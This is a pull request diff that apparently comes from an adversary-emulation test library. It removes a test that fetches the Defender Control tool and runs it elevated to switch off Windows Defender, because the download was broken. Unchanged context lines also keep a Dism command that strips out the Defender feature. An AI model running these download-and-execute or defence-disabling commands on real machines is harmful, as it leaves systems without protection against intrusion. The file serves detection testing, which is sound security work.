### PR TITLE
removing: Disable Defender with Defender Control

### DIFF
--- a/atomics/T1562.001/T1562.001.yaml
+++ b/atomics/T1562.001/T1562.001.yaml
@@ -550,37 +550,6 @@ atomic_tests:
       Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
     name: command_prompt
     elevation_required: true
-- name: Disable Defender with Defender Control
-  auto_generated_guid: 178136d8-2778-4d7a-81f3-d517053a4fd6
-  description: |
-    Attempting to use Defender Control software to disable Windows Defender. Upon successful execution, Windows Defender will be turned off. 
-  supported_platforms:
-  - windows
-  input_arguments:
-    DefenderID:
-      description: Defender ID that is used as a sort of passcode to disable it within Defender Control from the command line. The machine-specific Defender ID can be obtained within Defender Control by going to menu, command line info, and then retrieving the 4 character passcode to continue (listed after defendercontrol /d /id in the command line info window).
-      type: string
-      default: FFFF
-    DefenderControlExe:
-      description: Path to Defender Control software version 1.6.
-      type: string
-      default: $env:temp\DefenderControl\DefenderControl\DefenderControl.exe
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      Defender Control must be installed on the machine. 
-    prereq_command: |
-      if (Test-Path #{DefenderControlExe}) {exit 0} else {exit 1}
-    get_prereq_command: |
-      Start-BitsTransfer -Source "https://web.archive.org/web/20201210152711/https://www.sordum.org/files/download/defender-control/DefenderControl.zip" -Destination "$env:temp\defendercontrol.zip" -dynamic
-      expand-archive -LiteralPath "$env:temp\defendercontrol.zip" -DestinationPath "$env:temp\DefenderControl"
-  executor:
-    command: |
-      cmd /c #{DefenderControlExe} /D #{DefenderID} | Out-Null
-    cleanup_command: |
-      cmd /c #{DefenderControlExe} /E | Out-Null
-    name: powershell
-    elevation_required: true
 - name: Disable Defender Using NirSoft AdvancedRun
   auto_generated_guid: 81ce22fd-9612-4154-918e-8a1f285d214d
   description: |


### PR DESCRIPTION
The defender control download results in an invalid zip file so I'm removing this test until a working version can be created.